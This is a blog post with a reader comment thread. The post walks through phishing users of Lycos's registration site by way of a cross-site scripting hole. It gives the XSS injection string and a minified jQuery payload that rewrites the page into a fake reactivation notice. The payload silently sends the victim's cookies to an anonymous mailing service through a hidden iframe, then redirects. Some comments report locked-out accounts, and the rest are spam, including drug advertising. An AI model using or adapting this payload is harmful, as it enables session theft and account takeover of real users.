This site is soon to be deprecated by

Saturday, May 16, 2009

Phishing With jQuery - Registration.Lycos.Com

jQuery is a wonderful tool when the need to traverse the HTML DOM arises. With only a few lines of code the layout of a web page can be drastically altered. Using an XSS vulnerability and a bit of creativity we can manipulate, turning it into what appears to be a reactivation link that users must click to keep their accounts. When the user navigates to the page, the malicious code reads the value cookie and sends it to us using an anonymous mailing service. All of this will happen transparently as the user is waiting to be redirected to

First, we need the vulnerability.'/><script>alert('Hello, World');</script> will work.

Next is the jQuery. Using it we're going to alter the title and login form, then email the cookie value by appending a hidden iframe to TestDiv. The JavaScript below should fulfill these needs, mailing to

$(this).load(function() {
$('form').html('<div id="TestDiv"></div><h3 style="color:green;margin:">Activated</h3>Your account has been reactivated.<br />Redirecting to <a href=""></a>...');
var u = '' + escape(document.cookie) + '&kind=html';
$('#TestDiv').append('<iframe style="display:none;" src="' + u + '" />');

setTimeout("window.location='';", 5000);

To obscure our code and keep the URL short we can remove all unnecessary whitespace and append it to the end of the jQuery file. Doing so would look something like this:

[jQuery] $(this).load(function(){$('title').html('Reactivation');$('form').html('<div id="TestDiv"></div><h3 style="color:green;margin:">Activated</h3>Your account has been reactivated.<br />Redirecting to <a href=""></a>...');var u=''+escape(document.cookie)+'&kind=html';$('#TestDiv').append('<iframe style="display:none;" src="'+u+'"/>');setTimeout("window.location='';",5000);});

Include the modified version of jQuery using the vulnerability and the result will look like the screenshot below.'/><script src=""></script>


  1. very cut and dried, easy to understand. You should be a technical writer.

  2. Ummm, thanks a lot. So now all my private emails and account data is being sent to whom? Grrr, so crazy to think I'm a person who gives lots of my own free-time volunteering in my community and helping people out, and you are doing your best to fuck people over. What a crazy shitty world.

  3. I think someone actually took your code and totally screwed up Lycos for real. Perhaps you should look into it and help them sort it all out before you get a call from about a million lawyers - especially ones from Lycos.

  4. John,

    What does this means to all of us who are now locked out of our Lycos free email accounts?

  5. What does this mean now that we've all given away our usernames & passwords?!? Or are they only after our credit card numbers?

  6. First off, thanks to all for the feedback! Unfortunately this will not help anyone recover their free Lycos email account. As to whether the information contained in this post was used in a malicious manner, I do not know. If it was, such an occurance would be unfortunate and I certainly would not condone the acts of the individual(s) involved. This was posted for informational purposes only. Any anger should be redirected to those that provide a premium service with gaping holes in it. Exactly what information can be compromised using this vulnerability I am unsure of; I do not have a Lycos email account.

    1. I can not agree more with you!

  7. LMAO ... that is awesome!

  8. I, of course, a newcomer to this blog, but the author does not agree

  9. January 16, 2011 and the security problem is still there!! Glad I don't have a Lycos account!

  10. Once again great post. You seem to have a good understanding of these themes.When I entering your blog,I felt this . Come on and keep writting your blog will be more attractive. To Your Success!
    my computer has something wrong!
    maybe it does't update for a long time.

    Classic Dresses
    Classic Bridesmaid Dresses
    Wedding Dresses with Sleeves

  11. I love it,Excellent article.I am decide to put this into use one of these days.Thank you for sharing this.To Your Success!

    Rc Helicopter Parts|Rc Helicopter|Mini Rc Helicopter

  12. We all know that we need some entertainments to help us relax ourselves,if you are interested in playing World Of Warcraft,and want to know more things about and,you can come to our home to enjoy more happy.

  13. Thank you for sharing. It has already passed several days and we should let it go. I want to recommend you a reliable store selling wow gold with fast delivery speed. What's more, the code "sssss" will save you 5% of the total order.

  14. salam kenal bos. lagi jalan jalan pagi nih

  15. 聽說過“天生陽痿”嗎?

    網友:醫生你好,我有陽痿早泄威而鋼哪裡買 威而鋼 威而鋼 壯陽藥 威而鋼 犀利士哪裡買 壯陽藥品 壯陽藥 威而鋼 威而鋼哪裡買 威而鋼專賣店 威而鋼藥局 情色貼圖快兩年了,真的可以治威而鋼 犀利士 威而鋼哪裡買 犀利士 犀利士好嗎?
      醫生:有尿頻、尿急、尿壯陽藥 壯陽藥 威而鋼 犀利士 犀利士 犀利士專賣 犀利士 犀利士5mg價格 壯陽藥品 犀利士專賣 威而鋼 壯陽藥不盡、尿等待、尿分叉的感覺嗎?
      醫生:首先治療疾病,建議還是先做檢查,確診病因后再對癥治療為佳。導致陽痿早泄的病因是多種的,如精神因素;任何可能導致犀利士 犀利士 犀利士 犀利士 犀利士 威而鋼 威而鋼 威而鋼 威而鋼哪裡買 威而鋼 威而鋼 威而鋼 威而鋼 犀利士 壯陽藥品去哪買 犀利士 犀利士 犀利士 犀利士 犀利士陰莖海綿體動脈血流減少的疾病;手術、外傷引起陰莖有關血管和神經損傷,導致勃起功能障礙;內分泌疾患、慢性病和長期服用某些藥物;前列腺炎、前列腺增生反復發作久治不愈等。